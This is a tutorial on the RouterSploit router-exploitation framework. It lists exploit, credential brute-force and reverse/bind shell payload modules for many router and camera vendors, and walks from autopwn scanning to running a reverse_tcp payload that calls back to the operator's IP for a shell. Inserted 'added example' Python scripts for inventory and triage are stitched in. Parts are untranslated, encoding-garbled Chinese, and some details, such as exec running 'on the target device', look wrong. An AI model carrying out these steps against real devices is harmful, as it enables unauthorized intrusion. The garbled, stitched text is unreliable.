Getting started with RouterSploit, a router vulnerability testing tool
RouterSploit is a vulnerability testing tool aimed specifically at routers and embedded devices. It provides a set of functions for scanning, discovering and exploiting vulnerabilities in routers and embedded devices. The tool is written in Python and integrates a large number of exploit modules for routers and related devices, which users can apply in penetration tests and security assessments. RouterSploit is operated through a simple command-line interface and offers rich functionality, including scanning, exploitation and brute forcing, so that users can assess the security of a target device quickly and effectively.
RouterSploit's main functions include:
- Scanning: port scanning, service identification and vulnerability scanning of a target router or embedded device, giving the user a quick picture of the device's security status.
- Exploitation: a large set of exploit modules for routers and embedded devices, which the user can run against known vulnerabilities to verify a device's security or to perform penetration testing.
- Brute forcing: brute forcing of the authentication credentials of routers and related devices, to assess whether a device's authentication mechanism is secure.
- Modular framework: a modular design that lets the user easily add new exploit modules or extend existing functionality to keep up with changing security needs.
1. Installing on Kali
1.1 Installing RouterSploit
RouterSploit is not installed by default. When you type the routersploit command in a terminal, the system offers to install it; enter "Y" and then the password of the Kali account, and the installation runs automatically.
It can also be installed by cloning the repository:
git clone https://github.com/reverse-shell/routersploit
后面執(zhí)行顯示出錯還需要安裝一些需要的依賴包
pip install pycryptodome
1.2 Starting RouterSploit
Type routersploit in a terminal to launch the RouterSploit framework.
2. Main RouterSploit commands
2.1 Basic commands
1. help command
Displays the help information.
set:設(shè)置模塊的參數(shù),例如set RHOST 192.168.1.1設(shè)置目標(biāo)主機(jī)。
2.show命令
info:顯示模塊的基本信息和描述。
options:顯示模塊的可配置選項和參數(shù)。
advanced:顯示模塊的高級選項和參數(shù)。
devices:顯示已知設(shè)備的信息。
all:顯示所有可用的模塊。
encoders:顯示可用的編碼器。
creds:顯示已經(jīng)捕獲的憑證。
exploits:顯示可用的漏洞利用模塊。
scanners:顯示可用的掃描模塊。
wordlists:顯示可用的字典文件。
show all lists everything:
generic/upnp/ssdp_msearch
generic/bluetooth/btle_write
generic/bluetooth/btle_scan
generic/bluetooth/btle_enumerate
payloads/x86/reverse_tcp
payloads/x86/bind_tcp
payloads/perl/reverse_tcp
payloads/perl/bind_tcp
payloads/armle/reverse_tcp
payloads/armle/bind_tcp
payloads/php/reverse_tcp
payloads/php/bind_tcp
payloads/mipsle/reverse_tcp
payloads/mipsle/bind_tcp
payloads/mipsbe/reverse_tcp
payloads/mipsbe/bind_tcp
payloads/x64/reverse_tcp
payloads/x64/bind_tcp
payloads/cmd/netcat_reverse_tcp
payloads/cmd/perl_reverse_tcp
payloads/cmd/perl_bind_tcp
payloads/cmd/awk_bind_udp
payloads/cmd/awk_bind_tcp
payloads/cmd/python_reverse_udp
payloads/cmd/netcat_bind_tcp
payloads/cmd/php_bind_tcp
payloads/cmd/python_bind_udp
payloads/cmd/python_bind_tcp
payloads/cmd/python_reverse_tcp
payloads/cmd/awk_reverse_tcp
payloads/cmd/php_reverse_tcp
payloads/cmd/bash_reverse_tcp
payloads/python/reverse_udp
payloads/python/bind_udp
payloads/python/reverse_tcp
payloads/python/bind_tcp
scanners/autopwn
scanners/routers/router_scan
scanners/misc/misc_scan
scanners/cameras/camera_scan
encoders/php/hex
encoders/php/base64
encoders/python/hex
encoders/python/base64
creds/routers/netsys/telnet_default_creds
creds/routers/netsys/ftp_default_creds
creds/routers/netsys/ssh_default_creds
creds/routers/netcore/telnet_default_creds
creds/routers/netcore/ftp_default_creds
creds/routers/netcore/ssh_default_creds
creds/routers/ipfire/telnet_default_creds
creds/routers/ipfire/ftp_default_creds
creds/routers/ipfire/ssh_default_creds
creds/routers/technicolor/telnet_default_creds
creds/routers/technicolor/ftp_default_creds
creds/routers/technicolor/ssh_default_creds
creds/routers/3com/telnet_default_creds
creds/routers/3com/ftp_default_creds
creds/routers/3com/ssh_default_creds
creds/routers/2wire/telnet_default_creds
creds/routers/2wire/ftp_default_creds
creds/routers/2wire/ssh_default_creds
creds/routers/thomson/telnet_default_creds
creds/routers/thomson/ftp_default_creds
creds/routers/thomson/ssh_default_creds
creds/routers/huawei/telnet_default_creds
creds/routers/huawei/ftp_default_creds
creds/routers/huawei/ssh_default_creds
creds/routers/zte/telnet_default_creds
creds/routers/zte/ftp_default_creds
creds/routers/zte/ssh_default_creds
creds/routers/fortinet/telnet_default_creds
creds/routers/fortinet/ftp_default_creds
creds/routers/fortinet/ssh_default_creds
creds/routers/juniper/telnet_default_creds
creds/routers/juniper/ftp_default_creds
creds/routers/juniper/ssh_default_creds
creds/routers/pfsense/webinterface_http_form_default_creds
creds/routers/pfsense/ssh_default_creds
creds/routers/zyxel/telnet_default_creds
creds/routers/zyxel/ftp_default_creds
creds/routers/zyxel/ssh_default_creds
creds/routers/cisco/telnet_default_creds
creds/routers/cisco/ftp_default_creds
creds/routers/cisco/ssh_default_creds
creds/routers/ubiquiti/telnet_default_creds
creds/routers/ubiquiti/ftp_default_creds
creds/routers/ubiquiti/ssh_default_creds
creds/routers/asus/telnet_default_creds
creds/routers/asus/ftp_default_creds
creds/routers/asus/ssh_default_creds
creds/routers/movistar/telnet_default_creds
creds/routers/movistar/ftp_default_creds
creds/routers/movistar/ssh_default_creds
creds/routers/asmax/telnet_default_creds
creds/routers/asmax/ftp_default_creds
creds/routers/asmax/webinterface_http_auth_default_creds
creds/routers/asmax/ssh_default_creds
creds/routers/bhu/telnet_default_creds
creds/routers/bhu/ftp_default_creds
creds/routers/bhu/ssh_default_creds
creds/routers/belkin/telnet_default_creds
creds/routers/belkin/ftp_default_creds
creds/routers/belkin/ssh_default_creds
creds/routers/dlink/telnet_default_creds
creds/routers/dlink/ftp_default_creds
creds/routers/dlink/ssh_default_creds
creds/routers/comtrend/telnet_default_creds
creds/routers/comtrend/ftp_default_creds
creds/routers/comtrend/ssh_default_creds
creds/routers/tplink/telnet_default_creds
creds/routers/tplink/ftp_default_creds
creds/routers/tplink/ssh_default_creds
creds/routers/billion/telnet_default_creds
creds/routers/billion/ftp_default_creds
creds/routers/billion/ssh_default_creds
creds/routers/netgear/telnet_default_creds
creds/routers/netgear/ftp_default_creds
creds/routers/netgear/ssh_default_creds
creds/routers/mikrotik/telnet_default_creds
creds/routers/mikrotik/api_ros_default_creds
creds/routers/mikrotik/ftp_default_creds
creds/routers/mikrotik/ssh_default_creds
creds/routers/linksys/telnet_default_creds
creds/routers/linksys/ftp_default_creds
creds/routers/linksys/ssh_default_creds
creds/generic/snmp_bruteforce
creds/generic/ftp_default
creds/generic/telnet_default
creds/generic/http_basic_digest_default
creds/generic/ssh_bruteforce
creds/generic/ssh_default
creds/generic/http_basic_digest_bruteforce
creds/generic/telnet_bruteforce
creds/generic/ftp_bruteforce
creds/cameras/iqinvision/telnet_default_creds
creds/cameras/iqinvision/ftp_default_creds
creds/cameras/iqinvision/ssh_default_creds
creds/cameras/axis/telnet_default_creds
creds/cameras/axis/ftp_default_creds
creds/cameras/axis/webinterface_http_auth_default_creds
creds/cameras/axis/ssh_default_creds
creds/cameras/samsung/telnet_default_creds
creds/cameras/samsung/ftp_default_creds
creds/cameras/samsung/ssh_default_creds
creds/cameras/vacron/telnet_default_creds
creds/cameras/vacron/ftp_default_creds
creds/cameras/vacron/ssh_default_creds
creds/cameras/basler/telnet_default_creds
creds/cameras/basler/webinterface_http_form_default_creds
creds/cameras/basler/ftp_default_creds
creds/cameras/basler/ssh_default_creds
creds/cameras/siemens/telnet_default_creds
creds/cameras/siemens/ftp_default_creds
creds/cameras/siemens/ssh_default_creds
creds/cameras/arecont/telnet_default_creds
creds/cameras/arecont/ftp_default_creds
creds/cameras/arecont/ssh_default_creds
creds/cameras/avtech/telnet_default_creds
creds/cameras/avtech/ftp_default_creds
creds/cameras/avtech/ssh_default_creds
creds/cameras/hikvision/telnet_default_creds
creds/cameras/hikvision/ftp_default_creds
creds/cameras/hikvision/ssh_default_creds
creds/cameras/geovision/telnet_default_creds
creds/cameras/geovision/ftp_default_creds
creds/cameras/geovision/ssh_default_creds
creds/cameras/cisco/telnet_default_creds
creds/cameras/cisco/ftp_default_creds
creds/cameras/cisco/ssh_default_creds
creds/cameras/stardot/telnet_default_creds
creds/cameras/stardot/ftp_default_creds
creds/cameras/stardot/ssh_default_creds
creds/cameras/speco/telnet_default_creds
creds/cameras/speco/ftp_default_creds
creds/cameras/speco/ssh_default_creds
creds/cameras/brickcom/telnet_default_creds
creds/cameras/brickcom/ftp_default_creds
creds/cameras/brickcom/webinterface_http_auth_default_creds
creds/cameras/brickcom/ssh_default_creds
creds/cameras/mobotix/telnet_default_creds
creds/cameras/mobotix/ftp_default_creds
creds/cameras/mobotix/ssh_default_creds
creds/cameras/acti/telnet_default_creds
creds/cameras/acti/webinterface_http_form_default_creds
creds/cameras/acti/ftp_default_creds
creds/cameras/acti/ssh_default_creds
creds/cameras/videoiq/telnet_default_creds
creds/cameras/videoiq/ftp_default_creds
creds/cameras/videoiq/ssh_default_creds
creds/cameras/dlink/telnet_default_creds
creds/cameras/dlink/ftp_default_creds
creds/cameras/dlink/ssh_default_creds
creds/cameras/jvc/telnet_default_creds
creds/cameras/jvc/ftp_default_creds
creds/cameras/jvc/ssh_default_creds
creds/cameras/avigilon/telnet_default_creds
creds/cameras/avigilon/ftp_default_creds
creds/cameras/avigilon/ssh_default_creds
creds/cameras/canon/telnet_default_creds
creds/cameras/canon/ftp_default_creds
creds/cameras/canon/webinterface_http_auth_default_creds
creds/cameras/canon/ssh_default_creds
creds/cameras/grandstream/telnet_default_creds
creds/cameras/grandstream/ftp_default_creds
creds/cameras/grandstream/ssh_default_creds
creds/cameras/sentry360/telnet_default_creds
creds/cameras/sentry360/ftp_default_creds
creds/cameras/sentry360/ssh_default_creds
creds/cameras/american_dynamics/telnet_default_creds
creds/cameras/american_dynamics/ftp_default_creds
creds/cameras/american_dynamics/ssh_default_creds
creds/cameras/honeywell/telnet_default_creds
creds/cameras/honeywell/ftp_default_creds
creds/cameras/honeywell/ssh_default_creds
exploits/routers/netsys/multi_rce
exploits/routers/netcore/udp_53413_rce
exploits/routers/ipfire/ipfire_proxy_rce
exploits/routers/ipfire/ipfire_oinkcode_rce
exploits/routers/ipfire/ipfire_shellshock
exploits/routers/technicolor/tc7200_password_disclosure_v2
exploits/routers/technicolor/tc7200_password_disclosure
exploits/routers/technicolor/tg784_authbypass
exploits/routers/technicolor/dwg855_authbypass
exploits/routers/multi/misfortune_cookie
exploits/routers/multi/rom0
exploits/routers/multi/tcp_32764_rce
exploits/routers/multi/tcp_32764_info_disclosure
exploits/routers/multi/gpon_home_gateway_rce
exploits/routers/3com/officeconnect_rce
exploits/routers/3com/ap8760_password_disclosure
exploits/routers/3com/imc_path_traversal
exploits/routers/3com/officeconnect_info_disclosure
exploits/routers/3com/imc_info_disclosure
exploits/routers/2wire/gateway_auth_bypass
exploits/routers/2wire/4011g_5012nv_path_traversal
exploits/routers/thomson/twg849_info_disclosure
exploits/routers/thomson/twg850_password_disclosure
exploits/routers/huawei/e5331_mifi_info_disclosure
exploits/routers/huawei/hg530_hg520b_password_disclosure
exploits/routers/huawei/hg866_password_change
exploits/routers/huawei/hg520_info_disclosure
exploits/routers/zte/f460_f660_backdoor
exploits/routers/zte/zxv10_rce
exploits/routers/zte/zxhn_h108n_wifi_password_disclosure
exploits/routers/fortinet/fortigate_os_backdoor
exploits/routers/zyxel/zywall_usg_extract_hashes
exploits/routers/zyxel/p660hn_t_v2_rce
exploits/routers/zyxel/d1000_rce
exploits/routers/zyxel/p660hn_t_v1_rce
exploits/routers/zyxel/d1000_wifi_password_disclosure
exploits/routers/cisco/ucm_info_disclosure
exploits/routers/cisco/firepower_management60_path_traversal
exploits/routers/cisco/ucs_manager_rce
exploits/routers/cisco/secure_acs_bypass
exploits/routers/cisco/dpc2420_info_disclosure
exploits/routers/cisco/unified_multi_path_traversal
exploits/routers/cisco/ios_http_authorization_bypass
exploits/routers/cisco/firepower_management60_rce
exploits/routers/cisco/catalyst_2960_rocem
exploits/routers/ubiquiti/airos_6_x
exploits/routers/asus/asuswrt_lan_rce
exploits/routers/asus/rt_n16_password_disclosure
exploits/routers/asus/infosvr_backdoor_rce
exploits/routers/movistar/adsl_router_bhs_rta_path_traversal
exploits/routers/asmax/ar_804_gu_rce
exploits/routers/asmax/ar_1004g_password_disclosure
exploits/routers/bhu/bhu_urouter_rce
exploits/routers/belkin/n150_path_traversal
exploits/routers/belkin/g_plus_info_disclosure
exploits/routers/belkin/g_n150_password_disclosure
exploits/routers/belkin/play_max_prce
exploits/routers/belkin/auth_bypass
exploits/routers/belkin/n750_rce
exploits/routers/dlink/multi_hedwig_cgi_exec
exploits/routers/dlink/dir_645_password_disclosure
exploits/routers/dlink/dwl_3200ap_password_disclosure
exploits/routers/dlink/dsl_2740r_dns_change
exploits/routers/dlink/dir_300_645_815_upnp_rce
exploits/routers/dlink/dcs_930l_auth_rce
exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
exploits/routers/dlink/dsl_2750b_rce
exploits/routers/dlink/multi_hnap_rce
exploits/routers/dlink/dwr_932_info_disclosure
exploits/routers/dlink/dvg_n5402sp_path_traversal
exploits/routers/dlink/dir_8xx_password_disclosure
exploits/routers/dlink/dwr_932b_backdoor
exploits/routers/dlink/dir_645_815_rce
exploits/routers/dlink/dsl_2640b_dns_change
exploits/routers/dlink/dsp_w110_rce
exploits/routers/dlink/dir_815_850l_rce
exploits/routers/dlink/dir_300_600_rce
exploits/routers/dlink/dir_300_320_600_615_info_disclosure
exploits/routers/dlink/dgs_1510_add_user
exploits/routers/dlink/dsl_2750b_info_disclosure
exploits/routers/dlink/dir_850l_creds_disclosure
exploits/routers/dlink/dir_825_path_traversal
exploits/routers/dlink/dir_300_320_615_auth_bypass
exploits/routers/dlink/dns_320l_327l_rce
exploits/routers/dlink/dsl_2730_2750_path_traversal
exploits/routers/comtrend/ct_5361t_password_disclosure
exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure
exploits/routers/tplink/wdr740nd_wdr740n_path_traversal
exploits/routers/tplink/wdr740nd_wdr740n_backdoor
exploits/routers/tplink/archer_c2_c20i_rce
exploits/routers/billion/billion_7700nr4_password_disclosure
exploits/routers/billion/billion_5200w_rce
exploits/routers/shuttle/915wm_dns_change
exploits/routers/netgear/jnr1010_path_traversal
exploits/routers/netgear/dgn2200_ping_cgi_rce
exploits/routers/netgear/multi_rce
exploits/routers/netgear/prosafe_rce
exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
exploits/routers/netgear/r7000_r6400_rce
exploits/routers/netgear/multi_password_disclosure-2017-5521
exploits/routers/netgear/wnr500_612v3_jnr1010_2010_path_traversal
exploits/routers/netgear/n300_auth_bypass
exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure
exploits/routers/mikrotik/routeros_jailbreak
exploits/routers/linksys/wrt100_110_rce
exploits/routers/linksys/smartwifi_password_disclosure
exploits/routers/linksys/eseries_themoon_rce
exploits/routers/linksys/1500_2500_rce
exploits/routers/linksys/wap54gv3_rce
exploits/generic/ssh_auth_keys
exploits/generic/heartbleed
exploits/generic/shellshock
exploits/misc/asus/b1m_projector_rce
exploits/misc/wepresent/wipg1000_rce
exploits/misc/miele/pg8528_path_traversal
exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal
exploits/cameras/multi/netwave_ip_camera_information_disclosure
exploits/cameras/multi/dvr_creds_disclosure
exploits/cameras/multi/P2P_wificam_credential_disclosure
exploits/cameras/multi/P2P_wificam_rce
exploits/cameras/siemens/cvms2025_credentials_disclosure
exploits/cameras/cisco/video_surv_path_traversal
exploits/cameras/jovision/jovision_credentials_disclosure
exploits/cameras/brickcom/users_cgi_creds_disclosure
exploits/cameras/brickcom/corp_network_cameras_conf_disclosure
exploits/cameras/mvpower/dvr_jaws_rce
exploits/cameras/dlink/dcs_930l_932l_auth_bypass
exploits/cameras/avigilon/videoiq_camera_path_traversal
exploits/cameras/xiongmai/uc_httpd_path_traversal
exploits/cameras/grandstream/gxv3611hd_ip_camera_sqli
exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor
exploits/cameras/honeywell/hicc_1100pt_password_disclosure
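For a defender, the value of the show all listing above is as an inventory: which of the vendors in your own estate have ready-made exploit or default-credential modules, and what those modules do (RCE, password disclosure, path traversal, and so on). The following script is an added example, not code from the original post or from the RouterSploit project; it parses the listing by module type, vendor and impact keyword. SHOW_ALL_EXCERPT is a constructed excerpt of the listing, and the impact keywords are simply the suffixes that recur in the module names above.

```python
"""Inventory a RouterSploit `show all` listing by module type, vendor and impact.

Added example: not code from the original post or the RouterSploit project.
SHOW_ALL_EXCERPT is a constructed excerpt of the listing in the post; feed the
full listing (saved to a file) to parse_listing() for a complete inventory.
"""
from collections import Counter, defaultdict

# Constructed excerpt of the `show all` listing shown in the post.
SHOW_ALL_EXCERPT = """\
generic/upnp/ssdp_msearch
payloads/x86/reverse_tcp
scanners/autopwn
scanners/routers/router_scan
encoders/php/base64
creds/routers/dlink/telnet_default_creds
creds/routers/dlink/ssh_default_creds
creds/generic/ssh_bruteforce
creds/cameras/axis/webinterface_http_auth_default_creds
exploits/routers/dlink/dir_645_password_disclosure
exploits/routers/dlink/multi_hnap_rce
exploits/routers/netgear/multi_rce
exploits/generic/heartbleed
exploits/cameras/xiongmai/uc_httpd_path_traversal
"""

# Impact keywords as they appear in module names, checked in this order.
# "bruteforce" must precede "rce" because "bruteforce" ends in "rce".
IMPACT_KEYWORDS = (
    "password_disclosure", "creds_disclosure", "credentials_disclosure",
    "info_disclosure", "information_disclosure", "path_traversal",
    "auth_bypass", "authbypass", "dns_change", "backdoor", "sqli",
    "default_creds", "bruteforce", "rce",
)


def parse_module(path):
    """Split 'type/family/vendor/name' into a dict.

    Paths have 2 to 4 components: 'scanners/autopwn' has neither family
    nor vendor, 'creds/generic/ssh_bruteforce' has a family but no vendor.
    """
    parts = path.strip().split("/")
    middle = parts[1:-1]
    return {
        "path": path.strip(),
        "type": parts[0],
        "family": middle[0] if middle else None,
        "vendor": middle[1] if len(middle) > 1 else None,
        "name": parts[-1],
    }


def impact_of(name):
    """Classify a module by the first impact keyword found in its name."""
    for kw in IMPACT_KEYWORDS:
        if kw in name:
            return kw
    return "other"


def parse_listing(text):
    """Parse the listing, skipping blank lines and anything that is not a path."""
    return [parse_module(line) for line in text.splitlines() if "/" in line]


def count_by_type(modules):
    """How many modules of each type (exploits, creds, scanners, ...)."""
    return Counter(m["type"] for m in modules)


def modules_for_vendor(modules, vendor):
    """Sorted paths of every module aimed at one vendor, across all families."""
    return sorted(m["path"] for m in modules if m["vendor"] == vendor)


def vendor_exposure(modules):
    """vendor -> Counter of impacts, the table to compare against your asset list."""
    exposure = defaultdict(Counter)
    for m in modules:
        if m["vendor"]:
            exposure[m["vendor"]][impact_of(m["name"])] += 1
    return exposure


if __name__ == "__main__":
    mods = parse_listing(SHOW_ALL_EXCERPT)
    print(dict(count_by_type(mods)))
    for vendor, impacts in sorted(vendor_exposure(mods).items()):
        print(f"{vendor:10s} {dict(impacts)}")
```

The vendor table is the useful output: a vendor that appears with rce or default_creds entries is one whose devices should be checked for current firmware and for changed default passwords before anyone else runs this framework against them.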
3. run
Runs the current module against the target device.
4. use command
use: selects the module to use, for example an exploit module or a scanner module. Example: use scanners/autopwn
5. Executing a given command
exec: executes the given command in a shell; it can be used to run system commands and the like.
In RouterSploit, the exec command can be used to run a specific system command. You can use exec to run all kinds of operating-system commands and tools, including but not limited to the following:
(1) Running a system command
exec run ifconfig
This example runs the ifconfig command on the target device, displaying the network interface configuration.
(2) Running other tools:
exec run nmap -sP 192.168.0.1/24
This example runs an nmap scan on the target device to detect live hosts in the given subnet.
(3) Running a custom script
exec run /path/to/custom_script.sh arg1 arg2
This example runs a custom shell script on the target device, passing the arguments arg1 and arg2.
6. search command
search: searches for modules matching a given keyword.
7. Exiting and going back
exit: exits the RouterSploit tool.
back: returns to the previous menu level.
2.2 Symbols in scan results
RouterSploit's scan output and results use three symbols, [+], [-] and [*], with the following meanings:
[+] indicates a vulnerability is present: the scan result shows that the target system has one or more known security vulnerabilities.
[-] indicates no vulnerability: the scan result shows that no known security vulnerability was found on the target system.
[*] indicates undetermined: the scan could not determine whether the target system has a known security vulnerability, possibly because the scan conditions were insufficient or because of other unknown factors.
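When a scan is run against a fleet of devices, the [+], [-] and [*] markers end up in a log that someone has to turn into a findings list. The script below is an added example, not code from the original post or from the RouterSploit project: it parses marker lines into per-module verdicts and keeps the strongest verdict when a module is reported more than once, so a [*] progress line does not hide the [-] or [+] that follows it. SAMPLE_OUTPUT is constructed to mimic the marker format described above; the exact wording of real autopwn output may differ, so only the marker, the host:port token and the module path are relied on.

```python
"""Triage RouterSploit scanner output by its [+] / [-] / [*] markers.

Added example: not code from the original post or from the RouterSploit
project. SAMPLE_OUTPUT is constructed to mimic the marker format the post
describes; real wording may differ, so only the marker, the host:port token
and the module path are parsed.
"""
import re
from collections import Counter

# Constructed sample of scanner output (not captured from a real run).
SAMPLE_OUTPUT = """\
[*] 192.168.1.1 Starting vulnerability check...
[*] 192.168.1.1:80 http exploits/routers/dlink/dir_645_password_disclosure Checking...
[-] 192.168.1.1:80 http exploits/routers/dlink/dir_645_password_disclosure is not vulnerable
[+] 192.168.1.1:80 http exploits/routers/dlink/multi_hnap_rce is vulnerable
[*] 192.168.1.1:23 telnet creds/routers/dlink/telnet_default_creds Checking...
[*] 192.168.1.1:23 telnet creds/routers/dlink/telnet_default_creds Could not be verified
[-] 192.168.1.1:22 ssh creds/routers/dlink/ssh_default_creds is not vulnerable
[+] 192.168.1.1:80 http exploits/routers/dlink/dir_300_645_815_upnp_rce is vulnerable
garbage line without marker
"""

LINE_RE = re.compile(
    r"^\[(?P<mark>[+*-])\]\s+(?P<host>\S+?)(?::(?P<port>\d+))?\s+(?P<rest>.*)$"
)
MODULE_RE = re.compile(r"\b((?:exploits|creds|scanners)/[\w./-]+)")

STATUS = {"+": "vulnerable", "-": "not_vulnerable", "*": "undetermined"}
# Higher rank wins when the same module is reported more than once, so a
# "[*] ... Checking..." progress line never hides the verdict that follows.
RANK = {"undetermined": 0, "not_vulnerable": 1, "vulnerable": 2}


def parse_line(line):
    """Return (status, host, port, module) for a marker line, else None.

    Marker lines without a module path (framework progress messages) are
    returned with module=None so callers can decide to skip them.
    """
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    mod = MODULE_RE.search(m.group("rest"))
    port = int(m.group("port")) if m.group("port") else None
    return (STATUS[m.group("mark")], m.group("host"), port,
            mod.group(1) if mod else None)


def triage(text):
    """Map (host, port, module) -> final status, keeping the strongest verdict."""
    verdicts = {}
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed is None or parsed[3] is None:
            continue  # garbage, or a progress line without a module path
        status, host, port, module = parsed
        key = (host, port, module)
        if key not in verdicts or RANK[status] > RANK[verdicts[key]]:
            verdicts[key] = status
    return verdicts


def summary(text):
    """Count final verdicts per status: the numbers for the report table."""
    return Counter(triage(text).values())


def vulnerable_findings(text):
    """Sorted (host, port, module) entries flagged [+]: the items that need
    a firmware update, a configuration change or a vendor ticket."""
    hits = (k for k, v in triage(text).items() if v == "vulnerable")
    return sorted(hits, key=lambda k: (k[0], k[1] or 0, k[2]))


if __name__ == "__main__":
    for host, port, module in vulnerable_findings(SAMPLE_OUTPUT):
        print(f"{host}:{port}  {module}")
    print(dict(summary(SAMPLE_OUTPUT)))
```

Undetermined entries deserve a second look rather than being dropped: the post notes that [*] can mean the scan conditions were insufficient, so those modules should be re-run with corrected options or verified by hand before the finding is closed.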
3. RouterSploit workflow
3.1 Scanning a router for vulnerabilities with RouterSploit
1. Confirm the router's address
tracert www.sina.com.cn
The first hop in the result is the address of the local router.
3.2 Scan the router
use scanners/autopwn
show options
set RHOST 192.168.1.1
run
3.3 Check a vulnerability
use exploits/routers/3com/officeconnect_rce
set target 192.168.31.1
check
3.4 Exploitation
1. Configure the payload
The list of usable payloads (obtained with the show all command). Many articles online obtain it with the show payloads command, but that command was not found when running in the Kali environment, possibly related to the Python version.
payloads/x86/reverse_tcp
payloads/x86/bind_tcp
payloads/perl/reverse_tcp
payloads/perl/bind_tcp
payloads/armle/reverse_tcp
payloads/armle/bind_tcp
payloads/php/reverse_tcp
payloads/php/bind_tcp
payloads/mipsle/reverse_tcp
payloads/mipsle/bind_tcp
payloads/mipsbe/reverse_tcp
payloads/mipsbe/bind_tcp
payloads/x64/reverse_tcp
payloads/x64/bind_tcp
payloads/cmd/netcat_reverse_tcp
payloads/cmd/perl_reverse_tcp
payloads/cmd/perl_bind_tcp
payloads/cmd/awk_bind_udp
payloads/cmd/awk_bind_tcp
payloads/cmd/python_reverse_udp
payloads/cmd/netcat_bind_tcp
payloads/cmd/php_bind_tcp
payloads/cmd/python_bind_udp
payloads/cmd/python_bind_tcp
payloads/cmd/python_reverse_tcp
payloads/cmd/awk_reverse_tcp
payloads/cmd/php_reverse_tcp
payloads/cmd/bash_reverse_tcp
payloads/python/reverse_udp
payloads/python/bind_udp
payloads/python/reverse_tcp
payloads/python/bind_tcp
(1)選擇對應(yīng)的payload
use payloads/x64/reverse_tcp
(2)查看配置
show options
(3)設(shè)置payload
set lhost [你的ip]
(4)再次查看配置
show options
(5)開始攻擊
run
如果存在可利用的漏洞則反彈shell